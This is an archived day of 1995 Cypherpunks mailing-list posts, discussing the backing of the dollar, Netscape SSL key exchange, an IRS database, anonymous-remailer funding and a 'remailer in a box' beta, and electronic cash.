> > Uhh, no, US currency does not have any backing. I believe it was
> > Nixon who stopped it, possibly even earlier than him. There _used_ to
> > be Gold- and Silver-backed dollars, but no longer.
>
> Correct. Nixon dismantled the Bretton Woods system in (I think) '71.
>
>
> --
> Mark Chen
> chen at intuit.com
> 415/329-6913
> finger for PGP public key
> D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D

From jml at wizard.synapse.net Fri Jan 20 11:54:06 1995
From: jml at wizard.synapse.net (jml at wizard.synapse.net)
Date: Fri, 20 Jan 95 11:54:06 PST
Subject: internet world mag
Message-ID: <199501201953.OAA09328@sentinel.synapse.net>

>>Sorry to bother you but can you tell me how to get this mag ?
>>thanks

If you can't find it at your local bookstore then contact:

Internet world p.o. box 713, Mt Morris, il, 61054, USA or via email 74671.3430 at compuserve.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
wizard at alpha.c2.org
Give me the liberty to know, to utter, and to argue freely according to conscience, above all liberties.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From Ben.Goren at asu.edu Fri Jan 20 12:06:24 1995
From: Ben.Goren at asu.edu (Ben.Goren at asu.edu)
Date: Fri, 20 Jan 95 12:06:24 PST
Subject: The Remailer Crisis
Message-ID:

At 12:39 PM 1/20/95, Mark Chen wrote:
>> From: frissell at panix.com (Duncan Frissell)
>>
>> I offer to pay for and operate a remailer account on any system that will
>> have me.
>>
>> best.com, based in Mt. View, CA. Mail to postmaster at best.com, or try
>> the other standard extensions.
>
>As it happens, I just signed up for a SLIP account at Best. I'm using
>their standard dial-up service, but they also offer a dedicated 28.8
>connection for $450 setup and $60/mo.

You know, these fees everybody keeps quoting sound remarkably like the cost of a modem, the installation of a new phone line, plus a reasonable amount of profit.

So why don't a bunch of you, say in the Bay Area, get together to get a small subnet, each buy your own pair of modems, pay for the added phone line, and install the whole shootin' match in Tim's house?

>Mark Chen

b&

--
Ben.Goren at asu.edu, Arizona State University School of Music
Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059.
From chen at intuit.com Fri Jan 20 12:21:09 1995
From: chen at intuit.com (Mark Chen)
Date: Fri, 20 Jan 95 12:21:09 PST
Subject: Electronic cash illegal? (fwd)
In-Reply-To: <9501201950.AA06204@snark.imsi.com>
Message-ID: <9501202019.AA01877@doom>

> Re-read what was originally written carefully -- it claims neither
> that the dollar is backed nor that paper dollars are exchangeable for
> silver.
>
> .pm

I interpreted ". . . the legal definition of a 'dollar' in the US is still a certain weight of silver" to imply both. Apologies if I misconstrued.

>
> Mark Chen says:
> > Derek writes:
> > > > As far as I know, the legal definition of a "dollar" in the US is still a
> > > > certain weight of silver, and payment in silver legally satisfies debts;
> > > > under current silver prices, that probably costs more than a
> > > > $1 US Federal Reserve Note, so nobody bothers.
> > >
> > > Uhh, no, US currency does not have any backing. I believe it was
> > > Nixon who stopped it, possibly even earlier than him. There _used_ to
> > > be Gold- and Silver-backed dollars, but no longer.
> >
> > Correct. Nixon dismantled the Bretton Woods system in (I think) '71.
> >
> >
> > --
> > Mark Chen

--
Mark Chen
chen at intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D

From kipp at warp.mcom.com Fri Jan 20 12:25:09 1995
From: kipp at warp.mcom.com (Kipp E.B. Hickman)
Date: Fri, 20 Jan 95 12:25:09 PST
Subject: Netscape, RC4, key exchange?
Message-ID: <9501201949.AA17175@warp.mcom.com>

In article <19875.9501201052 at exe.dcs.exeter.ac.uk>, you write:
> -----BEGIN PGP SIGNED MESSAGE-----
>
> grendel at netaxs.com wrote:
> > aba at atlas.ex.ac.uk wrote:
> > > I have code to generate the RSA key pairs and modulus, what I am
> > > looking for is code to factorise a number using one of the better
> > > algorithms (quadratic sieve, etc.).
> >
> > It's been established that the encryption in Netscape is 40 bit
> >RC4, not 40 bit RSA, [...]
>
> Ok, so Netscape (the exported version only?) uses 40bit RC4 for
> encryption, but what about key exchange? RC4 is a stream cypher so
> both the receiver and sender need to know the key. Does anybody know
> what method Netscape uses to exchange keys DH, RSA, other? and what
> key sizes?

If you read the spec (http://www.mcom.com/info/SSL.html), you will see that SSL uses RSA public key encryption for key exchange. However, the protocol is slightly more general than that, so if there is a different public key algorithm it is possible for SSL to support it.

---------------------------------------------------------------------
Kipp E.B. Hickman
Netscape Communications Corp.
kipp at netscape.com
http://home.mcom.com/people/kipp/index.html

From xpat at vm1.spcs.umn.edu Fri Jan 20 12:46:08 1995
From: xpat at vm1.spcs.umn.edu (xpat at vm1.spcs.umn.edu)
Date: Fri, 20 Jan 95 12:46:08 PST
Subject: IRS to keep unreviewable secret dossiers on US citizens
Message-ID: <9501202045.AA10950@toad.com>

perry at imsi.com says:
>xpat at vm1.spcs.umn.edu says:
>> Excerpts from : St Paul Pioneer Press, Jan 29, 1995
>>
>> Here's the kicker: "Although agency officials concede that some of
>> the data collected will be inaccurate, taxpayers will not be allowed
>> to review or correct it" ^^^^^^^^^^^^^^^^^^^
>> ^^^^^^^^^^^^^^^^^^^^^^^
>The privacy act and FOIA make that more or less illegal -- if they are
>keeping information on you, with certain law enforcement related
>exceptions they have to let you see it.

I should add that later in the article it suggests the scenario of select information from the database being used in an audit, and you would be able to contest the specific information they use against you, but you would not be able to view any of the raw data.
^^^^^^^^^

It sounds like this amounts to "we don't have the info until we use it against you".
--------------------------------------------------------------------
P M Dierking |

From blancw at microsoft.com Fri Jan 20 12:49:29 1995
From: blancw at microsoft.com (Blanc Weber)
Date: Fri, 20 Jan 95 12:49:29 PST
Subject: IRS "DataBase"
Message-ID: <9501202049.AA05863@netmail2.microsoft.com>

A funny - I just saw this in some email:

"If guns are outlawed, how will liberals collect taxes?"
--- A. Nonymous

(Sorry, I didn't mean to bring up a crypto-unrelated political party/tax discussion. This is *strictly* a matter for Logic and Anarchy.)

..
Blanc

From sandfort at crl.com Fri Jan 20 12:57:10 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Fri, 20 Jan 95 12:57:10 PST
Subject: Electronic cash illegal? (fwd)
In-Reply-To: <9501201930.AA01571@doom>
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 20 Jan 1995, Mark Chen wrote:

> Derek writes:
> > . . .
> > Uhh, no, US currency does not have any backing. I believe it was
> > Nixon who stopped it, possibly even earlier than him. There _used_ to
> > be Gold- and Silver-backed dollars, but no longer.
>
> Correct. Nixon dismantled the Bretton Woods system in (I think) '71.

Well, sort of. My understanding is that the US dollar is still backed by gold on some theoretical bases. Nixon just closed the ``gold window.'' That is, foreigners are no longer allowed to get gold for greenbacks as was the case up until then. Of course, plain old Americans haven't been allowed to do that for the last 60 years or so.

As for FRNs, they are ultimately backed by a promise to pay in ``lawful money,'' i.e., US dollars. Can you say Ponzi?
S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From Jaeson.M.Engle at josaiah.sewanee.edu Fri Jan 20 12:59:16 1995
From: Jaeson.M.Engle at josaiah.sewanee.edu (Rhys Kyraden)
Date: Fri, 20 Jan 95 12:59:16 PST
Subject: Place for WWW info/ stuff
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I have a server (WWW and ftp) that I would like to use for anything anyone needs a place for. Drop me a line, or visit what's on my server (see below). The part of the server that I will be putting cypherpunk related material is password controlled, and cannot be accessed unless you have an account and password (assuming of course someone else doesn't break in and figure someone's out that is... but I don't see how they could.)

This is just FYI for all and anyone!

Cheers,
- -J

aka:
(-: Jaeson M. Engle || jme at josaiah.sewanee.edu :-)
(-: www server: http://josaiah.sewanee.edu/ :-)
(-: It's January 29th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme at josaiah.sewanee.edu' for my Public :-)
PGP block.

From davidm at iconz.co.nz Fri Jan 20 13:22:09 1995
From: davidm at iconz.co.nz (David Murray)
Date: Fri, 20 Jan 95 13:22:09 PST
Subject: Little ebanks -- a modest proposal.
Message-ID: <199501202120.KAA03412@iconz.co.nz>

[Executive Summary -- The author proposes a system of stamps for remailers as a way of starting up an ecash system. The stamps would be sold to the public as stamps, but be convertible by remailer operators into real money.]

Hal,

Many thanks for your comments. I'll try to make this less legalistically impenetrable.

Despite the difficulties, I think anon corps are possible - and legal.
What I was trying to stress is that they are expensive and inefficient: so you have to be really sure you want anonymity if you are going to use one.

The hurdles to ecash seem more formidable. The problem with moving off shore and ignoring the SEC, for instance, is that your scheme loses some credibility. Since the value of ecash is (in the short term, at least) going to be based on the possibility of converting it into real cash (just as the value of real cash is based on the possibility of converting it into real things), a structure that operates outside the law makes that value doubtful.

A large-scale rollout of ecash for the average Netscape user (and the people that service them) is going to need all the legitimacy it can muster. Perhaps, though, we can start small, and allow the forces of nature (greed, envy and, with a bit of luck, sloth) to take their course and scale a small scheme into a thriving e-economy.

What I have in mind is a service that provides estamps (you knew there had to be an 'e' in there somewhere, didn't you) for use with remailers. Jo Anonymous buys stamps, sticks them on her messages, and the anon-remailers collect them. The remailer ops then get to cash the stamps in for actual money, so they can pay their ISPs and lawyers.

At the heart of the scheme is a genuine (micro) ebank [a uebank?]. But, to avoid problems with offering securities to the public (and the SEC hassles etc), the ebank only sells estamps (little bits of ecash) to estamp-vendors. The estamp-vendors sell the stamps (with a mark-up?) to the public. [Perhaps using this new Netscape/Mastercard tie-in.] Because the estamp-vendors are only selling stamps (you can tell by the beautiful stamp-like gif-icons the vendor's Web page uses...) the SEC doesn't become involved. [I'm relying on the fact that the numbers involved are really small, and that the estamps *are* being sold for the purposes of postage. Perhaps the ebank and the vendor should be based off shore...]
This scheme breaks the credibility issue into two -- a large number of people (anonymous remailer users) have to be convinced of something relatively trivial (that the remailer will accept the stamps); a small number of people (anonymous remailer operators) have to be convinced of something relatively important (that the stamps are exchangeable for cash). If the remailer operators are sufficiently involved in the scheme, this should work.

One type of scalability comes when EITHER

A. Someone sets up as a Data Haven token vendor (the tokens being bought from the ebank as slightly larger bits of ecash), and data haven operators start to accept the Tokens, in the knowledge they can swap them for real money; OR

B. Data Haven operators start to accept estamps for their services, because they can swap them for cash;

OR both. [The first scenario obviously disguises the appearance of ecash as a medium of exchange for a bit longer.]

Another type of scalability comes when other people start uebanks, which then issue their own estamps/tokens/ecash to estamp/token vendors. If the new uebanks are as (provably) secure as the original(s), the uebanks could agree to clear each others' ecash and settle up at the end of the day (or some global equivalent - eg 12am GMT) using some kind of netting system.

As long as everyone played nice at the beginning (all the remailer operators declared their estamp income etc ;-) the uebanks could go legit: and by backing their submissions to regulators with a proven record of service (no need to stress that the remailers were *anonymous*), by wearing Al Gore t-shirts and garbling about the I-way and electronic town halls, and by not letting Tim May and his contract killers near the place, it might just work.

On the other hand, if the system is working well enough, there may be no need to go legit. (Although if I was an ebank operator I would be wary about entering into netting arrangements with an ebank the SEC etc could close down).
[But is netting needed with online clearing? Perhaps this would only be useful across currencies...]

With the ebanks in appropriate jurisdictions, operating in grey rather than obviously black areas (it is not so much that this stuff is being offered to the public as that the public is going out to *find* this stuff), with a proven track record in ponying up the cash, and with the approval of really cool people who get on the cover of Wired, Robin Public may not *need* any more assurance to participate in the e-economy.

What R.P. *will* need is products. Most of the attempts at net-commerce I've seen concentrate on offering things that can be delivered to people, either physically (so that the Compuserve Electronic Mall is basically a mail order catalogue) or electronically (hence the rather sketchy descriptions of anonymous markets, usually falling back on the idea that, because this is the Information Age, consulting is the root of all value...), to be consumed now (this tin of coffee, that movie-on-demand, the other set of nanotech plans).

But of course a lot of people (not, unfortunately, myself :-) have significant amounts of property that they do not consume right away. The possibility of anonymous investment (through eg anon corps) offers huge scope for the development of the e-economy. [I'll mention one statistic -- according to tax haven experts (Ginsberg, Spitz), in 1989 50% of all money processed internationally goes through tax havens.] After all, a capitalist economy (even an anarcho-capitalist economy) is built by capitalists, not wage slaves.

More later (unless you plead real hard...)

Cheers,

David

From rishab at dxm.ernet.in Fri Jan 20 14:23:56 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Fri, 20 Jan 95 14:23:56 PST
Subject: The Remailer Crisis
Message-ID:

Tim urges recently that we need to do something about the "remailer crisis."
I remember Sameer once mentioning that he could set up remailer-in-a-box accounts for possibly anonymous 'sponsors' who'd be the legal owners therefore indemnifying Sameer (the tolerant sysadmin) of responsibility. I know he allows 'remail-to-yourself' blind-server accounts for $10 / meg or something. That's probably a bit expensive for a sponsor of a public remailer (any stats on average remailer traffic?).

I never did hear any more from sameer or anyone else about remailers-in-boxed-accounts. I for one would be willing to 'sponsor' a remailer account on any system with a small fee - I can't run my own as my private site looks at the world through PPP.

I suggest that 'sponsored' remailers are a better way of making remailers economically viable for people like Sameer, who are the real, if not nominal, administrators. Though I hardly use remailers, those who do would probably make better (and more easily executed) use of their money if they sponsor remailer accounts on Cypherpunk ISPs like c2, rather than pay a (truenamed, legally vulnerable) operator for any single remailer. Sameer's blind-server code can come in use to make any link between the sponsor and her sponsored account very hard to detect.

The advantages of sponsoring remailer-site operators to create remailing accounts, rather than pay an individual remailer operator, are many:

1. innocent until proven guilty - presumably sponsors do use remailers a lot; but not necessarily. So the payment transaction can be via truename, rather than via some complicated anonymous means, and still leave the sponsor unimplicated

2. legal - an operator of a single remailer is vulnerable - technically, if not root, and legally otherwise.
an administrator of a Cypherpunk ISP is not, and does not have the legal right to monitor a customer's traffic, and with blind-servers even detailed logging doesn't lead back to the owner of an account, the sponsor, from any _specific_ remailer (though a pool of sponsors exists for a pool of remailer accounts)

3. technical - it's not possible to ban a single remailer, as there may be _many_ on a site. If the site is much more than just remailers, it's not really possible to ban the entire site.

4. traffic analysis - more remailer addresses will make traffic analysis harder, and chaining more fun - you could chain through multiple accounts on a single site with little loss in reliability (though you'll still want to go through more sites)

5. remailer explosion - more reliable remailers (due to the '-in-a-box', more users, wider distribution

Comments?

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                    "In between the breaths is
rishab at dxm.ernet.in                  the space where we live"
rishab at arbornet.org                     - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335
H 34C Saket, New Delhi 110017, INDIA

From rishab at dxm.ernet.in Fri Jan 20 14:37:02 1995
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Fri, 20 Jan 95 14:37:02 PST
Subject: Netherlands crypto ban?
Message-ID:

What's the update on the move to ban private crypto in Holland? Last I remember there were trial balloons, but nothing happened.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                    "In between the breaths is
rishab at dxm.ernet.in                  the space where we live"
rishab at arbornet.org                     - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335
H 34C Saket, New Delhi 110017, INDIA

From pstemari at erinet.com Fri Jan 20 15:20:42 1995
From: pstemari at erinet.com (Paul J. Ste.
Marie)
Date: Fri, 20 Jan 95 15:20:42 PST
Subject: IRS to keep unreviewable secret dossiers on US citizens
Message-ID: <9501202311.AB09922@eri.erinet.com>

At 12:44 PM 1/20/95 CST, xpat at vm1.spcs.umn.edu wrote:
>Excerpts from : St Paul Pioneer Press, Jan 29, 1995
>
>"IRS plans to collect more data on individuals to nab tax cheats"

[...]

Here's the text from the recent EPIC announcement on this--it covers the exemption the IRS is claiming from the FOIA in a bit more detail (sorry if people have already seen this):

=======================================================================
[6] IRS Initiates Massive New Database
=======================================================================

On December 20, the Internal Revenue Service announced in the Federal Register that it was planning a new database to monitor compliance of taxpayers in a project entitled Compliance 2000. The database would contain information on all individuals in the U.S. who conduct certain financial transactions and would be segmented by different criteria:

Any individual who has business and/or financial activities. These may be grouped by industry, occupation, or financial transactions, included in commercial databases, or in information provided by state and local licensing agencies.

The new database will combine private and public sector databases in a single searchable entity. A number of federal financial databases from the IRS will be enhanced with state, local and commercial sources. The Federal Register notice describes the non-tax databases:

Examples of other information would include data from commercial databases, any state's Department of Motor Vehicles (DMV), credit bureaus, state and local real estate records, commercial publications, newspapers, airplane and pilot information, U.S. Coast Guard vessel registration information, any state's Department of Natural Resources information, as well as other state and local records.
In addition, Federal government databases may also be accessed, such as, federal employment files, federal licensing data, etc.

Finally, even though the proposed system would use frequently inaccurate "commercial databases" such as direct marketing records, taxpayers would not be able to review their records to ensure that they are accurate and up to date: "This system is exempt from the access and contest provisions of the Privacy Act."

EPIC is filing comments asking the IRS to reconsider its use of commercial databases and to ensure that there are greater safeguards on the collection and use of personal information.

A copy of the Federal Register notice is available at cpsr.org /cpsr/privacy/epic/IRS_compliance_2000_notice_txt

Comments on the proposed system must be received by January 19, 1995, and sent to Office of Disclosure, Internal Revenue Service, 1111 Conn. Ave, NW, Washington, DC 20224.

EPIC's Comments are available at cpsr.org /cpsr/privacy/epic/epic_irs_compliance_2000_comments.txt

--Paul J. Ste. Marie
pstemari at well.sf.ca.us, pstemari at erinet.com

From tcmay at netcom.com Fri Jan 20 15:20:55 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 15:20:55 PST
Subject: The Remailer Crisis
In-Reply-To:
Message-ID: <199501202316.PAA19895@netcom8.netcom.com>

rishab at dxm.ernet.in wrote:

> Tim urges recently that we need to do something about the "remailer crisis."
>
> I remember Sameer once mentioning that he could set up remailer-in-a-box
> accounts for possibly anonymous 'sponsors' who'd be the legal owners therefore
> indemnifying Sameer (the tolerant sysadmin) of responsibility. I know he allows
> 'remail-to-yourself' blind-server accounts for $10 / meg or something. That's
> probably a bit expensive for a sponsor of a public remailer (any stats on
....

I of course agree with everything Rishab just said, because I've made these points repeatedly over the last year or so.
The "remailer-in-a-box" was even my coinage, though I make no claims to working on it more than just proposing some ideas.

I mention this because I sense a fair amount of frustration by many of us that the same ideas keep coming up, keep getting general support, but don't move along further. I've certainly felt this, and I know others have, too. (I sometimes think that nearly all messages here are just skimmed by the readers, so the same stuff keeps bubbling up over and over again.)

Yet I'm not pointing a finger at the remailer operators or anyone else. The problems are systemic, related to why things don't get done.

In any case, I strongly urge--and have several times now--that the act of owning or operating a site be explicitly disconnected from the act of having an account that does remailing.

Sites/Owners that allow remailing accounts ARE NOT THE SAME AS accounts/owners that actually do the remailing!

Further, there is no legal requirement (U.S.) that accounts be "identifiable" publicly--and probably no legal requirement that accounts be identifiable at _all_.

Thus, I could buy (Rishab's "sponsor") a remailer account on foo.bar for some amount of money, paid with paper currency sent to the remailer (just to help defray costs, not as a sophisticated "paid remailer" scheme).

(And if charges of abuse, or legal letters from the Church of Aptical Foddering, cause the site owner to "shut down" account remailer73 at foo.bar, then a new account, remailer121 at foo.bar can be instantiated immediately. Nothing illegal about this, unless the site itself is (somehow) declared to be a contributory nuisance or somesuch.)

For reasons which should be apparent to all, having my name, or any other name, attached to a remailer (e.g., "Tim-Remailer at foo.bar") could invite deliberate attacks, spams, etc.
Better to have remailers have no such flags or invitations, a point several of you have also commented on (in terms of picking domain names that are not inflammatory or that will not trigger local scrutiny).

Like Duncan F., I will be willing to sponsor or buy some remailer accounts. How many I sponsor will depend on the price, features, reliability, etc. (Please do not post "Hey, I'm willing to do this, so send me your $100 now." messages....for obvious reasons.) I am waiting for such services to be actually, formally, solidly announced, not just casual remarks that it might be possible. And of course the software should be "ready to wear," port-a-potty, so that the remailer account owner does nothing more than pay for the account.

(Aside: I strongly recommend that some emergent naming conventions be discussed. For example, the "remailers-in-a-box" may need to be "no frills" remailers, with no errors reported to the sender, no help to those who send the wrong instructions, no hand-holding, and even _no further contact_ between those who sponsored/bought the accounts and the account itself! This could be marked as "anon-nf-137 at foo.bar," meaning, an anon account, no frills, number 137 (of many more, hopefully). And so on.)

And it will also depend on site reliability, uptime, etc. One site I would otherwise be tempted to sponsor a remailer account on recently took 5 days to forward a test message, so the problems are apparent. (I believe remailer operators need to _promote_ their sites, by citing uptimes, features, policies....but this is another one of those ideas that keeps coming up over and over again, from various people.)

The "crisis" I am talking about is that we are down to a handful of sites, down from nearly 20 at one time, and with no apparent upward trend in numbers.

Separating the act of having the courage/dedication to allow remailers from the act of operating remailers out of accounts is the key.
--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From nzook at bga.com Fri Jan 20 15:34:06 1995
From: nzook at bga.com (Nathan Zook)
Date: Fri, 20 Jan 95 15:34:06 PST
Subject: Spam Busters!
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Yeah, the numbers should be higher. This was just a hypothetical!

nzook at bga.com said:
> There is little, if anything, we can do to stop a chained, PGP'ed mail
> bomb, "This is mail bomb number XXX. Boom!" It is therefore in our best
> interest to not encourage children to send such messages in such a way. I
> believe Homer's message was erroneous for this reason.

People, please! Before criticizing a method, look at the threat model! I plainly stated that my method was not intended to deal with real trouble.

tcmay: "The From: line is notoriously misleading". But it still gives enough that we need remailers in the first place, right? The "From:" was a token. It wasn't meant as a literal. For id'ing postmaster, all you need is the xx.xx.xx.xx, right?

jalicqui "Unless your remailer was the terminal remailer for a significant number.." But in a serious spam/mailbomb attack, someone would _have_ to get a bunch, right? With the changing session keys, and a chain, the best we could hope for would be to stop it on its way out. (or use for padding ;-)

Incidentally, a per/customer volume limit would also control the binaries. Since we have little hope of id'ing the true originator, we might have to limit a site.
(bad) OTOH, if someone tried to send binaries, only to find that they couldn't get more than 1M out an hour, they would probably give up & go somewhere else. We might also hit the chained pgp bomber this way, as the messages would likely be fairly large?

XXX

But this all misses a point that I would like to stress. We are in what the military refers to as "low-intensity combat". Right now, we don't have a continuous stream of spam-bombs floating through our systems. (Well, we did, but jp shut down :-(( ) Right now, we (other than PRZ) don't have serious legal troubles. Right now, our remailers are too weak to be a significant problem to the TLAs (any more than a forged From:). The way to win a low-intensity battle is to avoid escalating unless you are sure you can win.

Eventually, we will have to standardize packets. Eventually, we will have to employ very sophisticated techniques to deal with spam-bomb. But maybe we don't do that today. Maybe we do just enough to catch a bunch of the most juvenile. Then the next bunch is smarter. Then we catch them. We keep going.

You see, I doubt that we can take on a spammer that knows the net as well as anyone here. But I don't doubt that word can get out that the remailers nail spammers. Of course, we risk becoming the latest challenge to the juvenile, but I think that this is far less likely than it appears at first because we are, after all, "really cool".

My suggestion is to avoid, for as long as possible, letting on to _anyone_ just how sophisticated our systems are, just how much can be done, until we are sure we can win the unavoidable battles.

XXX

This also strongly points to per-line blocking of remailers. Since the necessary steps to catch a sUPer bomber appear to be impossible/impractical, we must offer anon-blocking for those poor souls that request it. Perhaps anon-block for a month at a time. This is part of that PR that we need to watch.
To put it another way, if our services make it easy(er) for someone to engage in an activity that we oppose, and that can hurt (subjective) someone else, we are facing a moral responsibility for our actions. We should attempt to fulfill that responsibility. I believe that the phone company even allows people to change numbers for free if they are receiving harassing calls. And we want to be better thought of than the phone company, right?

XXX

BTW, do you have to be a remailer operator to be on the list? If not, I'd like to know how to subscribe...

Finger or request keyserver for PGP 2.6.2 (tm) key. PGP<->Mail/News installation incomplete.
Factors for modulus are not proven primes. Key may be far weaker than expected.
Encode at your own risk.
Key ID: 14712B4D 1994/12/26 Nathan H. Zook
Key fingerprint = 44 B3 D8 66 3D 55 1E 2E F8 92 22 A6 33 8C DE 24

From anonymous-remailer at shell.portal.com Fri Jan 20 15:55:31 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 20 Jan 95 15:55:31 PST
Subject: Why emoney? Why not a web of debt?
Message-ID: <199501202354.PAA13275@jobe.shell.portal.com>

[summary -- digital silk road along a web of debt-trust]

Umm... money is not anything mystical -- it is just a convenient way to trade and settle debts. It was invented to solve the hassles of trading a pound of butter, for a box of eggs, that for a tightly woven basket, and finally that for the gun you wanted in the first place. Yuch! accounting!!

But electronic computers are good at checking out these kinds of chains automatically. Suppose there were a web of debt-trust. Each person would indicate the other people who's iou's they will accept (and the amount they would be willing to take). Thus I might take (up to $10 of) Jo's, who might take Carol's who might take Terry's, etc.

To buy something from me online, you will need to produce an IOU from Jo, Carol or Terry. I would hand it to Jo for verification. Jo would accept it or reject it (perhaps after talking to some other folks online). If it were a CarolIOU, or a TerryIOU I would insist Jo trade it for a JoIOU. All the details could be hidden behind a nice little GUI.

Jo and I would continuously balance the books between us by trading JoIOUs for NoybIOU's. After a while one of us might well end up with enough extra IOUs that we want to get paid. Perhaps the other would perform services directly, or pay FRN's or gold, or whatever.

If one of my friends wasn't able to run an online IOU server, I could probably trade things with my friend for IOU's. Not that I'm running a bank or anything.

Without everyone being online though I don't see an easy way to prevent double spending. Is there an offline multiple exchange token system invented yet?

Noyb

From jrochkin at cs.oberlin.edu Fri Jan 20 16:32:04 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 20 Jan 95 16:32:04 PST
Subject: Why emoney? Why not a web of debt?
Message-ID:

At 6:54 PM 01/20/95, anonymous-remailer at shell.portal.com wrote:
> But electronic computers are good at checking out these kinds of
>chains automatically. Suppose there were a web of debt-trust. Each
>person would indicate the other people who's iou's they will accept
>(and the amount they would be willing to take). Thus I might take (up
>to $10 of) Jo's, who might take Carol's who might take Terry's, etc.
>
> To buy something from me online, you will need to produce an IOU
>from Jo, Carol or Terry.
>I would hand it to Jo for verification. Jo
>would accept it or reject it (perhaps after talking to some other
>folks online). If it were a CarolIOU, or a TerryIOU I would insist Jo
>trade it for a JoIOU. All the details could be hidden behind a nice
>little GUI.

Certainly, that's what money is after all. Pretty much. But how are you going to transfer these IOUs electronically in a way that is relatively fraud-proof? Digital money. Ecash. When we say "ecash", we're talking about what Chaum was writing about in whatever paper, what Schneier describes protocols for in AC. Maybe the ecash is redeemable in US dollars, or maybe it's redeemable for 10 units of service from Jon Smith, but an ecash protocol is what you are going to use to transfer and issue those digital certificates of value, whatever the value represents.

And of course, if you want to use these certificates of value anonymously, which is what is required to pay for an anon remailer, there are some slightly more stringent requirements. The right kind of ecash protocol can still handle it. But Carol probably shouldn't be paying for a remailer in CarolBucks (or CarolIOUs, whatever), at least not unless Carol is such a big spender that CarolBucks are in wide circulation and used by lots of people other than Carol. Which I guess is possible in your system.

A pseudo-anarchist non-state-supported debt system would work fine, but you still need a mechanism to transfer your certificates of value, whether they stand for ten U.S. dollars, or 10 hours that Jon Smith will work mowing your lawn. And another way to look at it is that you are just proposing an ecash system where every person issues their own ecash, instead of just a few central banks doing it. There are advantages and disadvantages to that sort of thing, and it might be something interesting to think about, but you ultimately aren't going to be able to do it over a computer network without ecash.
Ecash is the way you represent value certificates in digital form, pretty much. From jya at pipeline.com Fri Jan 20 16:57:45 1995 From: jya at pipeline.com (John Young) Date: Fri, 20 Jan 95 16:57:45 PST Subject: Purshottam Message-ID: <199501210057.TAA29696@pipe2.pipeline.com> >----- Forwarded message (Andrew Purshottam ) -----< Dear Mr. Purshottam, Mail to boings. From jackr at dblues.engr.sgi.com Fri Jan 20 17:19:40 1995 From: jackr at dblues.engr.sgi.com (Jack Repenning) Date: Fri, 20 Jan 95 17:19:40 PST Subject: Why emoney? Why not a web of debt? In-Reply-To: <199501202354.PAA13275@jobe.shell.portal.com> Message-ID: <16152.790650879@dblues.engr.sgi.com> Recently, someone wrote: But electronic computers are good at checking out these kinds of chains automatically. Not that good. Loss of connectivity, limited bandwidth, and cumulative table size would all make this impractical very quickly, I think. From adamfast at seanet.com Fri Jan 20 17:22:20 1995 From: adamfast at seanet.com (Adam Feuer) Date: Fri, 20 Jan 95 17:22:20 PST Subject: Why emoney? Why not a web of debt? In-Reply-To: Message-ID: Noyb asks if there are offline methods of IOU-token exchange... well, one way of doing it is LETS, the Local Exchange Trading System-- a non-computerized way of exchanging value in a community. it doesn't exactly use money. there are thousands of LETS's worldwide, i've never used one and don't know how they work in practice, tho i'd like to find out! they seem like a good idea. it seems like the ideas could be extended to the net-- there seems to be a synergy with digital signatures, etc. 
a good place to find info about LETS is:

LETSystems - the Home Page

-adam
adamfast at seanet.com

From sameer at c2.org Fri Jan 20 17:43:18 1995
From: sameer at c2.org (sameer)
Date: Fri, 20 Jan 95 17:43:18 PST
Subject: Remailer In a Box available for beta testing
Message-ID: <199501210142.RAA28133@soda.CSUA.Berkeley.EDU>

I finally got annoyed with Tim clamoring for a Remailer in a Box, so I set it up just now... I just wrote it so there may be some problems I haven't gotten rid of yet.

If you want to run a remailer on c2.org:

1) Sign up for a shell account on http://www.c2.org/services/signup.html

2) Log into your account (via dialup [510-549-1383] or telnet [c2.org]) once it has been created. (within a day.. I'll automate account creation so it gets made within an hour soon, but right now I am doing it manually.)

3) If you wish, you can setup a .forward file to point to mailfilters or to another account.

4) Run the program /usr/local/lib/boxed-remailer/install_remail. The remailer will be installed, and non-remailed mail will be acted upon according to how the account was setup before you ran the program.

5) Answer the questions, they should be pretty simple.

Once an account is created there is a one week free grace period. If you'd like to continue the account you can pay for it. If you have problems and suggestions, make sure you mail me, and I'll fix it. This is still in beta testing, so if you have problems I won't disable the account waiting for payment until the problems are fixed.

$10 for one month, $27 for 3 months, $45 for 6 months.
